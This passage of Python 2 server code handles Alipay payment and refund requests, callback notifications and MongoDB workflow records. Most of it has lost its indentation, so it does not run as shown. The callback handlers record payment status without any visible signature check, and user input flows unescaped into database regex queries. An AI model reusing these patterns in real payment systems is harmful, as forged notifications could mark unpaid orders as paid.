ret += '&'
return ret
def get_pay_record_by_id(querydict):
ret = None
if querydict['pay_channel'] == 'alipay':
out_trade_no = querydict['out_trade_no']
db_util.mongo_init_client('pay_platform')
client = db_util.gClientMongo['pay_platform']
db = client['pay']
if 'pay_log' in db.collection_names(False):
collection = db['pay_log']
ret = collection.find_one({"out_trade_no":out_trade_no})
return ret
def refund_alipay(querydict):
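    # Builds a 'refund_fastpay_by_platform_pwd' request (batch of one) against the
    # pay_log record looked up by out_trade_no, records the attempt via
    # update_refund_log, and enqueues the request payload on gJoinableQueue for an
    # out-of-band sender (signing and submission are assumed to happen there).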
global ENCODING
global gConfig, gSecurityConfig, gJoinableQueue
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
href = str(gConfig['pay_platform']['alipay']['submit_gateway'])
sign_data = {}
sign_data['_input_charset'] = gConfig['pay_platform']['alipay']['input_charset']
sign_data['partner'] = gConfig['pay_platform']['alipay']['partner_id']
sign_data['service'] = 'refund_fastpay_by_platform_pwd'
sign_data['refund_date'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
sign_data['batch_no'] = datetime.datetime.now().strftime("%Y%m%d") + str(ObjectId())
sign_data['batch_num'] = '1'
querydict['refund_date'] = sign_data['refund_date']
querydict['batch_no'] = sign_data['batch_no']
querydict['batch_num'] = int(sign_data['batch_num'])
if len(gConfig['pay_platform']['alipay']['return_url'])>0:
sign_data['return_url'] = gConfig['pay_platform']['alipay']['return_url']
if len(gConfig['pay_platform']['alipay']['error_notify_url'])>0:
sign_data['error_notify_url'] = gConfig['pay_platform']['alipay']['error_notify_url']
if len(gConfig['pay_platform']['alipay']['notify_url'])>0:
sign_data['notify_url'] = gConfig['pay_platform']['alipay']['notify_url']
rec = get_pay_record_by_id(querydict)
if rec:
if rec.has_key('error_code'):
body = json.dumps({'result':'refund_fail_pay_has_fail' }, ensure_ascii=True, indent=4)
else:
if rec.has_key('seller_email') \
and rec.has_key('trade_no') :
trade_no = rec['trade_no']
sign_data['seller_email'] = rec['seller_email']
querydict['seller_email'] = sign_data['seller_email']
querydict['trade_no'] = trade_no
detail_data = '%s^%.2f^%s' % (trade_no, float(querydict['refund_fee']), querydict['refund_desc'] )
sign_data['detail_data'] = detail_data
if not rec.has_key('seller_email'):
body = json.dumps({'result':'refund_fail_seller_email_required' }, ensure_ascii=True, indent=4)
if not rec.has_key('trade_no'):
body = json.dumps({'result':'refund_fail_trade_no_required' }, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'refund_fail_pay_trade_not_found:%s' % querydict['out_trade_no']}, ensure_ascii=True, indent=4)
if len(body) == 0:
#querydict['refund_result'] = 'refund_sending_to_alipay'
querydict['refund_result'] = 'refund_adding_to_queue'
querydict['refund_fee'] = float(querydict['refund_fee'])
g = gevent.spawn(update_refund_log, querydict['out_trade_no'], querydict)
#g1 = sign_and_send_alipay('post', href, sign_data)
#g1.join()
#resp = g1.value
#s = resp.read()
#print('refund response: [%s]' % dec(s))
#body = json.dumps({'result':'refund_sending_to_alipay'}, ensure_ascii=True, indent=4)
        try:
            gJoinableQueue.put({'thirdpay':'alipay', 'method':'post', 'url':href, 'data':sign_data})
        except gevent.queue.Full:
            body = json.dumps({'result':'refund_err_queue_full'}, ensure_ascii=True, indent=4)
        else:
            body = json.dumps({'result':'refund_adding_to_queue'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def pay_alipay(querydict):
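    # Builds a 'create_direct_pay_by_user' request (optionally routed to a specific bank
    # via defaultbank/paymethod), logs the pending trade with update_pay_log, and
    # enqueues the request payload on gJoinableQueue; the caller gets
    # 'pay_adding_to_queue' back, or a queue-full error.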
global ENCODING
global gConfig, gSecurityConfig, gJoinableQueue
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
href = str(gConfig['pay_platform']['alipay']['submit_gateway'])
if not href[-1:] == '?':
href += '?'
sign_data = {}
sign_data['_input_charset'] = gConfig['pay_platform']['alipay']['input_charset']
sign_data['total_fee'] = querydict['total_fee']
sign_data['out_trade_no'] = querydict['out_trade_no']
sign_data['partner'] = gConfig['pay_platform']['alipay']['partner_id']
sign_data['payment_type'] = '1'
sign_data['seller_email'] = querydict['seller_email']
sign_data['buyer_email'] = querydict['buyer_email']
sign_data['service'] = 'create_direct_pay_by_user'
sign_data['subject'] = querydict['subject']
if len(gConfig['pay_platform']['alipay']['return_url'])>0:
sign_data['return_url'] = gConfig['pay_platform']['alipay']['return_url']
if len(gConfig['pay_platform']['alipay']['error_notify_url'])>0:
sign_data['error_notify_url'] = gConfig['pay_platform']['alipay']['error_notify_url']
if len(gConfig['pay_platform']['alipay']['notify_url'])>0:
sign_data['notify_url'] = gConfig['pay_platform']['alipay']['notify_url']
#querydict['trade_status'] = 'pay_sending_to_alipay'
querydict['trade_status'] = 'pay_adding_to_queue'
querydict['total_fee'] = float(querydict['total_fee'])
if querydict.has_key('defaultbank'):
if gSecurityConfig['alipay']['bank_code'].has_key(querydict['defaultbank']):
sign_data['defaultbank'] = querydict['defaultbank']
sign_data['paymethod'] = 'bankPay'
else:
body = json.dumps({'result':'pay_fail_wrong_bank_code'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
if gConfig['pay_platform']['alipay']['need_ctu_check'].lower() == 'true':
sign_data['need_ctu_check'] = 'Y'
if gConfig['pay_platform']['alipay']['anti_fishing'].lower() == 'true':
sign_data['anti_phishing_key'] = ''
sign_data['exter_invoke_ip'] = ''
g = gevent.spawn(update_pay_log, querydict['out_trade_no'], querydict)
#g1 = sign_and_send_alipay('post', href, sign_data)
#body = json.dumps({'result':'pay_sending_to_alipay'}, ensure_ascii=True, indent=4)
    try:
        gJoinableQueue.put({'thirdpay':'alipay','method':'post', 'url':href, 'data':sign_data})
    except gevent.queue.Full:
        body = json.dumps({'result':'pay_err_queue_full'}, ensure_ascii=True, indent=4)
    else:
        body = json.dumps({'result':'pay_adding_to_queue'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def handle_refund(environ):
global ENCODING
global gConfig
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
querydict = {}
if environ.has_key('QUERY_STRING') and len(environ['QUERY_STRING'])>0:
querystring = environ['QUERY_STRING']
querystring = urllib.unquote_plus(querystring)
querydict = urlparse.parse_qs(dec(querystring))
d = {}
for k in querydict.keys():
d[k] = querydict[k][0]
querydict = d
try:
buf = environ['wsgi.input'].read()
ds_plus = urllib.unquote_plus(buf)
d = json.loads(dec(ds_plus))
for k in d.keys():
querydict[k] = d[k]
except:
pass
if len(querydict.keys()) > 0:
if querydict.has_key('out_trade_no') and len(querydict['out_trade_no'])>0\
and querydict.has_key('pay_channel') and len(querydict['pay_channel'])>0\
and querydict.has_key('refund_fee') and len(querydict['refund_fee'])>0\
and querydict.has_key('refund_desc') and len(querydict['refund_desc'])>0:
if querydict['pay_channel'] == 'alipay':
refund_fee = 0
try:
refund_fee = float(querydict['refund_fee'])
except:
body = json.dumps({'result':'refund_fail_refund_fee_wrong_format'}, ensure_ascii=True, indent=4)
refund_fee = 0
if '^' in querydict['refund_desc'] \
or '#' in querydict['refund_desc'] \
or '|' in querydict['refund_desc'] \
or '$' in querydict['refund_desc'] \
or len(querydict['refund_desc'])>128 :
refund_fee = 0
body = json.dumps({'result':'refund_fail_refund_desc_wrong_charactor'}, ensure_ascii=True, indent=4)
if refund_fee>0:
statuscode, headers, body = refund_alipay(querydict)
#else:
#body = json.dumps({'result':'refund_fail_refund_fee_wrong_format'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'refund_fail_unsupport_pay_channel'}, ensure_ascii=True, indent=4)
if not querydict.has_key('out_trade_no') or len(querydict['out_trade_no'])==0:
body = json.dumps({'result':'refund_fail_out_trade_no_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('refund_fee') \
or (isinstance(querydict['refund_fee'], unicode) and len(querydict['refund_fee'])==0) \
or (isinstance(querydict['refund_fee'], float) and querydict['refund_fee']==0.0):
body = json.dumps({'result':'refund_fail_refund_fee_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('refund_desc') or len(querydict['refund_desc'])==0:
body = json.dumps({'result':'refund_fail_refund_desc_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('pay_channel') or len(querydict['pay_channel'])==0:
body = json.dumps({'result':'refund_fail_pay_channel_required'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'refund_fail_wrong_data_format'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def handle_pay_getinfo(environ):
global ENCODING
global gConfig, gSecurityConfig
def get_collection(collection):
ret = None
db_util.mongo_init_client('pay_platform')
db = db_util.gClientMongo['pay_platform'][gConfig['pay_platform']['mongodb']['database']]
if not collection in db.collection_names(False):
ret = db.create_collection(collection)
else:
ret = db[collection]
return ret
def query_pay_log(condition):
ret = []
collection = get_collection(gConfig['pay_platform']['mongodb']['collection_pay_log'])
ret = list(collection.find(condition))
#for i in cur:
#ret.append(i)
return ret
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
querydict = {}
if environ.has_key('QUERY_STRING') and len(environ['QUERY_STRING'])>0:
querystring = environ['QUERY_STRING']
querystring = urllib.unquote_plus(querystring)
querydict = urlparse.parse_qs(dec(querystring))
d = {}
for k in querydict.keys():
d[k] = querydict[k][0]
querydict = d
try:
buf = environ['wsgi.input'].read()
ds_plus = urllib.unquote_plus(buf)
d = json.loads(dec(ds_plus))
for k in d.keys():
querydict[k] = d[k]
except:
pass
if len(querydict.keys()) > 0:
if querydict.has_key('q'):
if querydict['q'] == 'bank_info':
if querydict.has_key('bank_code'):
if querydict['bank_code'] == 'all' or len(querydict['bank_code'])==0:
body = json.dumps(gSecurityConfig['alipay']['bank_code'], ensure_ascii=True, indent=4)
else:
if gSecurityConfig['alipay']['bank_code'].has_key(querydict['bank_code']):
body = json.dumps(gSecurityConfig['alipay']['bank_code'][querydict['bank_code']], ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'wrong_bank_code'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'unknown_query_type'}, ensure_ascii=True, indent=4)
elif querydict['q'] == 'error_info':
if querydict.has_key('error_code'):
if querydict['error_code'] == 'all' or len(querydict['error_code'])==0:
body = json.dumps(gSecurityConfig['alipay']['error_code'], ensure_ascii=True, indent=4)
else:
if gSecurityConfig['alipay']['error_code'].has_key(querydict['error_code']):
body = json.dumps(gSecurityConfig['alipay']['error_code'][querydict['error_code']], ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'wrong_error_code'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'unknown_query_type'}, ensure_ascii=True, indent=4)
elif querydict['q'] == 'trade_status':
if querydict.has_key('out_trade_no'):
if len(querydict['out_trade_no'])>0:
l = []
if isinstance(querydict['out_trade_no'], unicode):
l = query_pay_log({'out_trade_no': querydict['out_trade_no']})
elif isinstance(querydict['out_trade_no'], list):
idlist = [ObjectId(i) for i in querydict['out_trade_no']]
l = query_pay_log({'out_trade_no': {'$in': idlist}})
if len(l) > 0:
ll = []
for i in l:
o = {}
o['out_trade_no'] = i['out_trade_no']
if i.has_key('trade_status'):
o['trade_status'] = i['trade_status']
else:
o['trade_status'] = None
if i.has_key('error_code'):
o['error_code'] = i['error_code']
else:
o['error_code'] = None
if i.has_key('refund_status'):
o['refund_status'] = i['refund_status']
else:
o['refund_status'] = None
ll.append(o)
body = json.dumps(db_util.remove_mongo_id(ll), ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'out_trade_no_not_exist'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'out_trade_cannot_be_null'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'out_trade_no_required'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'unknown_query_type'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def handle_pay(environ):
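    # Validates a payment request (out_trade_no, subject, total_fee, buyer_email,
    # seller_email, pay_channel; subject must avoid the ^ # | $ % & + separators and stay
    # under 128 characters) and hands alipay payments on to pay_alipay; anything else
    # yields a descriptive pay_fail_* result.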
global ENCODING
global gConfig
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
querydict = {}
if environ.has_key('QUERY_STRING') and len(environ['QUERY_STRING'])>0:
querystring = environ['QUERY_STRING']
querystring = urllib.unquote_plus(querystring)
querydict = urlparse.parse_qs(dec(querystring))
d = {}
for k in querydict.keys():
d[k] = querydict[k][0]
querydict = d
try:
buf = environ['wsgi.input'].read()
ds_plus = urllib.unquote_plus(buf)
d = json.loads(dec(ds_plus))
for k in d.keys():
querydict[k] = d[k]
except:
pass
if len(querydict.keys()) > 0:
if querydict.has_key('out_trade_no') and len(querydict['out_trade_no'])>0 \
and querydict.has_key('subject') and len(querydict['subject'])>0 \
and querydict.has_key('total_fee') and len(querydict['total_fee'])>0 \
and querydict.has_key('buyer_email') and len(querydict['buyer_email'])>0 \
and querydict.has_key('seller_email') and len(querydict['seller_email'])>0 \
and querydict.has_key('pay_channel') and len(querydict['pay_channel'])>0 :
if querydict['pay_channel'] == 'alipay':
#if querydict.has_key('service'):
total_fee = 0
try:
total_fee = float(querydict['total_fee'])
except:
body = json.dumps({'result':'pay_fail_total_fee_wrong_format'}, ensure_ascii=True, indent=4)
total_fee = 0
if '^' in querydict['subject'] \
or '#' in querydict['subject'] \
or '|' in querydict['subject'] \
or '$' in querydict['subject'] \
or '%' in querydict['subject'] \
or '&' in querydict['subject'] \
or '+' in querydict['subject'] \
or len(querydict['subject'])>128 :
total_fee = 0
body = json.dumps({'result':'pay_fail_subject_wrong_charactor'}, ensure_ascii=True, indent=4)
if total_fee>0:
statuscode, headers, body = pay_alipay(querydict)
else:
body = json.dumps({'result':'pay_fail_total_fee_wrong_format'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'pay_fail_unsupport_pay_channel'}, ensure_ascii=True, indent=4)
if not querydict.has_key('out_trade_no') or len(querydict['out_trade_no'])==0:
body = json.dumps({'result':'pay_fail_out_trade_no_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('subject') or len(querydict['subject'])==0:
body = json.dumps({'result':'pay_fail_subject_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('total_fee') \
or (isinstance(querydict['total_fee'], unicode) and len(querydict['total_fee'])==0) \
or (isinstance(querydict['total_fee'], float) and querydict['total_fee']==0.0):
body = json.dumps({'result':'pay_fail_total_fee_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('buyer_email') or len(querydict['buyer_email'])==0:
body = json.dumps({'result':'pay_fail_buyer_email_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('seller_email') or len(querydict['seller_email'])==0:
body = json.dumps({'result':'pay_fail_seller_email_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('pay_channel') or len(querydict['pay_channel'])==0:
body = json.dumps({'result':'pay_fail_pay_channel_required'}, ensure_ascii=True, indent=4)
else:
body = json.dumps({'result':'pay_fail_wrong_data_format'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
def update_refund_log(out_trade_no, data, is_insert=True):
db_util.mongo_init_client('pay_platform')
client = db_util.gClientMongo['pay_platform']
db = client['pay']
if not 'refund_log' in db.collection_names(False):
collection = db.create_collection('refund_log')
collection.ensure_index([("out_trade_no", pymongo.ASCENDING),])
else:
collection = db['refund_log']
rec = collection.find_one({"out_trade_no":out_trade_no})
if data.has_key('refund_fee') and (isinstance(data['refund_fee'], unicode) or isinstance(data['refund_fee'], str)):
data['refund_fee'] = float(data['refund_fee'])
if rec:
for k in data.keys():
rec[k] = data[k]
wr = collection.update({'_id':rec['_id']}, db_util.add_mongo_id(rec), multi=False, upsert=False)
if wr and wr['n'] == 0:
print('update out_trade_no [%s] failed' % out_trade_no)
else:
if is_insert:
try:
_id = collection.insert( db_util.add_mongo_id(data))
#print('refund_log insert _id=%s' % str(_id))
except:
print('refund_log insert out_trade_no [%s] failed' % out_trade_no)
def update_pay_log(out_trade_no, data, is_insert=True):
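    # Inserts or updates a record keyed by out_trade_no in pay.pay_log (creating the
    # collection and its out_trade_no index on first use), coercing
    # total_fee/refund_fee/price/quantity from strings to numbers before writing.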
db_util.mongo_init_client('pay_platform')
client = db_util.gClientMongo['pay_platform']
db = client['pay']
if not 'pay_log' in db.collection_names(False):
collection = db.create_collection('pay_log')
collection.ensure_index([("out_trade_no", pymongo.ASCENDING),])
else:
collection = db['pay_log']
rec = collection.find_one({"out_trade_no":out_trade_no})
if data.has_key('total_fee') and (isinstance(data['total_fee'], unicode) or isinstance(data['total_fee'], str)):
data['total_fee'] = float(data['total_fee'])
if data.has_key('refund_fee') and (isinstance(data['refund_fee'], unicode) or isinstance(data['refund_fee'], str)):
data['refund_fee'] = float(data['refund_fee'])
if data.has_key('price') and (isinstance(data['price'], unicode) or isinstance(data['price'], str)):
data['price'] = float(data['price'])
if data.has_key('quantity') and (isinstance(data['quantity'], unicode) or isinstance(data['quantity'], str)):
data['quantity'] = int(data['quantity'])
if rec:
for k in data.keys():
rec[k] = data[k]
wr = collection.update({'_id':rec['_id']}, db_util.add_mongo_id(rec), multi=False, upsert=False)
#print(wr)
if wr and wr['n'] == 0:
print('update out_trade_no [%s] failed' % out_trade_no)
else:
if is_insert:
try:
_id = collection.insert( db_util.add_mongo_id(data))
#print('pay_log insert _id=%s' % str(_id))
except:
print('pay_log insert out_trade_no [%s] failed' % out_trade_no)
def handle_alipay_return_url(environ):
global ENCODING
global gConfig, gSecurityConfig
querydict = {}
data = {}
data['pay_channel'] = 'alipay'
querystring = ''
if environ.has_key('QUERY_STRING'):
querystring = environ['QUERY_STRING']
querystring = urllib.unquote_plus(querystring)
querystring = dec_by_code(gConfig['pay_platform']['alipay']['input_charset'], querystring)
querydict = urlparse.parse_qs(querystring)
d = {}
for k in querydict.keys():
d[k] = querydict[k][0]
querydict = d
if querydict.has_key('notify_type') and 'trade_status_' in querydict['notify_type'] and querydict.has_key('out_trade_no'):
if querydict.has_key('is_success'):
if querydict['is_success'] == 'T':
data['trade_status'] = 'send_to_alipay_success'
if querydict.has_key('seller_email'):
data['seller_email'] = querydict['seller_email']
if querydict.has_key('buyer_email'):
data['buyer_email'] = querydict['buyer_email']
if querydict.has_key('seller_id'):
data['seller_id'] = querydict['seller_id']
if querydict.has_key('buyer_id'):
data['buyer_id'] = querydict['buyer_id']
if querydict.has_key('notify_time'):
data['notify_time'] = querydict['notify_time']
if querydict.has_key('notify_type'):
data['notify_type'] = querydict['notify_type']
if querydict.has_key('notify_id'):
data['notify_id'] = querydict['notify_id']
if querydict.has_key('out_trade_no'):
data['out_trade_no'] = querydict['out_trade_no']
if querydict.has_key('subject'):
data['subject'] = querydict['subject']
if querydict.has_key('payment_type'):
data['payment_type'] = querydict['payment_type']
if querydict.has_key('trade_no'):
data['trade_no'] = querydict['trade_no']
if querydict.has_key('trade_status'):
data['trade_status'] = querydict['trade_status']
if gSecurityConfig['alipay']['trade_status'].has_key(data['trade_status']):
data['trade_status_desc'] = gSecurityConfig['alipay']['trade_status'][data['trade_status']]
if querydict.has_key('gmt_create'):
data['gmt_create'] = querydict['gmt_create']
if querydict.has_key('gmt_payment'):
data['gmt_payment'] = querydict['gmt_payment']
if querydict.has_key('gmt_close'):
data['gmt_close'] = querydict['gmt_close']
if querydict.has_key('gmt_refund'):
data['gmt_refund'] = querydict['gmt_refund']
if querydict.has_key('body'):
data['body'] = querydict['body']
if querydict.has_key('error_code'):
data['error_code'] = querydict['error_code']
if querydict.has_key('bank_seq_no'):
data['bank_seq_no'] = querydict['bank_seq_no']
if querydict.has_key('out_channel_type'):
data['out_channel_type'] = querydict['out_channel_type']
if querydict.has_key('out_channel_amount'):
data['out_channel_amount'] = querydict['out_channel_amount']
if querydict.has_key('out_channel_inst'):
data['out_channel_inst'] = querydict['out_channel_inst']
if querydict.has_key('business_scene'):
data['business_scene'] = querydict['business_scene']
if querydict.has_key('total_fee'):
data['total_fee'] = querydict['total_fee']
if data.has_key('out_trade_no'):
g = gevent.spawn(update_pay_log, data['out_trade_no'], data, False)
def handle_alipay_notify_url(environ):
global gConfig, gSecurityConfig
buf = environ['wsgi.input'].read()
ds_plus = urllib.unquote_plus(buf)
ds_plus = dec_by_code(gConfig['pay_platform']['alipay']['input_charset'], ds_plus)
querydict = {}
data = {}
data['pay_channel'] = 'alipay'
try:
querydict = urlparse.parse_qs(ds_plus)
d = {}
for k in querydict.keys():
d[k] = querydict[k][0]
querydict = d
except:
querydict = {}
if querydict.has_key('seller_email'):
data['seller_email'] = querydict['seller_email']
if querydict.has_key('buyer_email'):
data['buyer_email'] = querydict['buyer_email']
if querydict.has_key('seller_id'):
data['seller_id'] = querydict['seller_id']
if querydict.has_key('buyer_id'):
data['buyer_id'] = querydict['buyer_id']
if querydict.has_key('notify_time'):
data['notify_time'] = querydict['notify_time']
if querydict.has_key('notify_id'):
data['notify_id'] = querydict['notify_id']
if querydict.has_key('notify_type'):
data['notify_type'] = querydict['notify_type']
if querydict.has_key('out_trade_no'):
data['out_trade_no'] = querydict['out_trade_no']
if querydict.has_key('subject'):
data['subject'] = querydict['subject']
if querydict.has_key('payment_type'):
data['payment_type'] = querydict['payment_type']
if querydict.has_key('trade_no'):
data['trade_no'] = querydict['trade_no']
if querydict.has_key('trade_status'):
data['trade_status'] = querydict['trade_status']
if gSecurityConfig['alipay']['trade_status'].has_key(data['trade_status']):
data['trade_status_desc'] = gSecurityConfig['alipay']['trade_status'][data['trade_status']]
if querydict.has_key('gmt_create'):
data['gmt_create'] = querydict['gmt_create']
if querydict.has_key('gmt_payment'):
data['gmt_payment'] = querydict['gmt_payment']
if querydict.has_key('gmt_close'):
data['gmt_close'] = querydict['gmt_close']
if querydict.has_key('gmt_refund'):
data['gmt_refund'] = querydict['gmt_refund']
if querydict.has_key('body'):
data['body'] = querydict['body']
if querydict.has_key('error_code'):
data['error_code'] = querydict['error_code']
if querydict.has_key('bank_seq_no'):
data['bank_seq_no'] = querydict['bank_seq_no']
if querydict.has_key('out_channel_type'):
data['out_channel_type'] = querydict['out_channel_type']
if querydict.has_key('out_channel_amount'):
data['out_channel_amount'] = querydict['out_channel_amount']
if querydict.has_key('out_channel_inst'):
data['out_channel_inst'] = querydict['out_channel_inst']
if querydict.has_key('business_scene'):
data['business_scene'] = querydict['business_scene']
if querydict.has_key('total_fee'):
data['total_fee'] = querydict['total_fee']
if querydict.has_key('notify_type') and 'trade_status_' in querydict['notify_type'] and data.has_key('out_trade_no'):
g = gevent.spawn(update_pay_log, data['out_trade_no'], data, False)
if querydict.has_key('notify_type') and querydict['notify_type'] == 'batch_refund_notify':
if querydict.has_key('batch_no'):
data['batch_no'] = querydict['batch_no']
if querydict.has_key('success_num'):
data['success_num'] = int(querydict['success_num'])
if querydict.has_key('result_details'):
arr = querydict['result_details'].split('^')
trade_no = arr[0]
refund_fee = float(arr[1])
refund_status = arr[2]
data['trade_no'] = trade_no
data['refund_fee'] = refund_fee
data['refund_status'] = refund_status
g = gevent.spawn(update_refund_log, data['trade_no'], data, False)
def handle_alipay_error_notify_url(environ):
global gConfig, gSecurityConfig
buf = environ['wsgi.input'].read()
ds_plus = urllib.unquote_plus(buf)
ds_plus = dec_by_code(gConfig['pay_platform']['alipay']['input_charset'], ds_plus)
querydict = {}
data = {}
data['pay_channel'] = 'alipay'
try:
querydict = urlparse.parse_qs(ds_plus)
d = {}
for k in querydict.keys():
d[k] = querydict[k][0]
querydict = d
except:
querydict = {}
if querydict.has_key('out_trade_no'):
data['out_trade_no'] = querydict['out_trade_no']
if querydict.has_key('error_code'):
data['error_code'] = querydict['error_code']
if gSecurityConfig['alipay']['error_code'].has_key(data['error_code']):
data['error_desc'] = gSecurityConfig['alipay']['error_code'][data['error_code']]
if data.has_key('out_trade_no'):
g = gevent.spawn(update_pay_log, data['out_trade_no'], data, False)
#g.join()
def get_querydict_by_GET_POST(environ):
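    # Normalises request parameters: QUERY_STRING is decoded and parsed as JSON if
    # possible (falling back to urlencoded key/value pairs), then merged with multipart
    # form fields parsed by werkzeug (form keys that are themselves JSON are expanded).
    # The first uploaded file, if any, contributes filename/content_type/mimetype and its
    # raw bytes, which are returned as the second element of (querydict, buf).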
querydict = {}
buf = None
if environ.has_key('QUERY_STRING'):
querystring = environ['QUERY_STRING']
querystring = urllib.unquote_plus(querystring)
querystring = dec(querystring)
try:
d = json.loads(querystring)
if isinstance(d, dict):
for k in d.keys():
querydict[k] = d[k]
except:
querydict = urlparse.parse_qs(querystring)
d = {}
for k in querydict.keys():
d[k] = querydict[k][0]
querydict = d
# try:
# # buf = environ['wsgi.input'].read()
# buf = stream.read()
# print('buf=')
# print(buf)
# ds_plus = urllib.unquote_plus(buf)
# obj = json.loads(dec(ds_plus))
# for k in obj.keys():
# querydict[k] = obj[k]
# except:
# pass
stream, form, files = werkzeug.formparser.parse_form_data(environ, charset='utf-8')
if len(form.keys()) > 0:
for key in form.keys():
try:
if isinstance(key, str):
key = dec(key)
obj = json.loads(key)
if isinstance(obj, dict):
for k in obj.keys():
querydict[k] = obj[k]
if isinstance(obj, list):
querydict = obj
except Exception,e:
print(e)
querydict[key] = form[key]
file_storage_list = []
if len(files.keys()) > 0:
for key in files.keys():
file_storage_list.extend(files.getlist(key))
for file_storage in file_storage_list:
if isinstance(file_storage, werkzeug.datastructures.FileStorage):
querydict['filename'] = file_storage.filename
querydict['content_type'] = file_storage.content_type
querydict['mimetype'] = file_storage.mimetype
# querydict['content_length'] = file_storage.content_length
buf = file_storage.read()
break
return querydict, buf
def handle_combiz_platform(environ):
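    # Workflow and form endpoints of the combiz platform, backed by the MongoDB
    # collections configured under gConfig['combiz_platform']['mongodb']; the nested
    # helpers below implement add/query/update/delete for workflows and workflow
    # templates plus blank/filled form generation.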
global ENCODING
global gConfig, gRequest, gFormTemplate
def get_collection(collection):
ret = None
db_util.mongo_init_client('combiz_platform')
db = db_util.gClientMongo['combiz_platform'][gConfig['combiz_platform']['mongodb']['database']]
if not collection in db.collection_names(False):
ret = db.create_collection(collection)
else:
ret = db[collection]
return ret
#Rule('/workflow_add', endpoint='workflow_add'),
#Rule('/workflow_query', endpoint='workflow_query'),
#Rule('/workflow_query/<_id>', endpoint='workflow_query'),
#Rule('/workflow_update', endpoint='workflow_update'),
#Rule('/workflow_delete', endpoint='workflow_delete'),
#Rule('/workflow_delete/<_id>', endpoint='workflow_delete'),
#Rule('/workflow_template_add', endpoint='workflow_template_add'),
#Rule('/workflow_template_query', endpoint='workflow_template_query'),
#Rule('/workflow_template_query/<_id>', endpoint='workflow_template_query'),
#Rule('/workflow_template_update', endpoint='workflow_template_update'),
#Rule('/workflow_template_delete', endpoint='workflow_template_delete'),
#Rule('/workflow_template_delete/<_id>', endpoint='workflow_template_delete'),
def workflow_add(querydict):
ret = ''
if querydict.has_key('order_id'):
try:
collection = get_collection(gConfig['combiz_platform']['mongodb']['collection_workflow'])
existone = collection.find_one({'order_id':querydict['order_id']})
if existone:
ret = json.dumps({'result':u'workflow_add_order_id_already_exist' }, ensure_ascii=True, indent=4)
else:
_id = collection.save(querydict)
o = collection.find_one({'_id':_id})
ret = json.dumps(db_util.remove_mongo_id(o), ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'workflow_add_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_add_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_add_order_id_required' }, ensure_ascii=True, indent=4)
return ret
def workflow_query(querydict):
ret = ''
o = None
try:
#print(querydict)
collection = get_collection(gConfig['combiz_platform']['mongodb']['collection_workflow'])
limit = 10
skip = 0
ssort = None
cond = {}
if querydict.has_key('limit'):
limit = int(querydict['limit'])
if querydict.has_key('offset'):
skip = int(querydict['offset'])
if querydict.has_key('order'):
ssort = []
if querydict['order'] == 'asc':
ssort = [('order_id', pymongo.ASCENDING),]
if querydict['order'] == 'desc':
ssort = [('order_id', pymongo.DESCENDING),]
if querydict.has_key('_id'):
o = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
elif querydict.has_key('order_id'):
if '*' in querydict['order_id']:
cond = {'order_id': {'$regex':'^.*' + querydict['order_id'].replace('*', '') + '.*$'}}
#print(cond)
o = list(collection.find(cond, skip=skip, limit=limit, sort=ssort))
#print(o)
else:
o = collection.find_one({'order_id':querydict['order_id']})
else:
ssort = None
cond = {}
if querydict.has_key('search_field') and querydict.has_key('search'):
cond = {str(querydict['search_field']): {'$regex':'^.*' + querydict['search'].replace('*', '') + '.*$'}}
if querydict.has_key('order'):
ssort = []
if querydict['order'] == 'asc':
ssort = [(str(querydict['search_field']), pymongo.ASCENDING),]
if querydict['order'] == 'desc':
ssort = [(str(querydict['search_field']), pymongo.DESCENDING),]
o = list(collection.find(cond, skip=skip, limit=limit, sort=ssort))
if o:
ret = json.dumps(db_util.remove_mongo_id(o), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_query_workflow_not_exist' }, ensure_ascii=True, indent=4)
#if not querydict.has_key('_id') and not querydict.has_key('order_id'):
#ret = json.dumps({'result':u'workflow_query_id_or_order_id_required' }, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'workflow_query_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'workflow_query_fail' }, ensure_ascii=True, indent=4)
return ret
def workflow_update(querydict):
ret = ''
try:
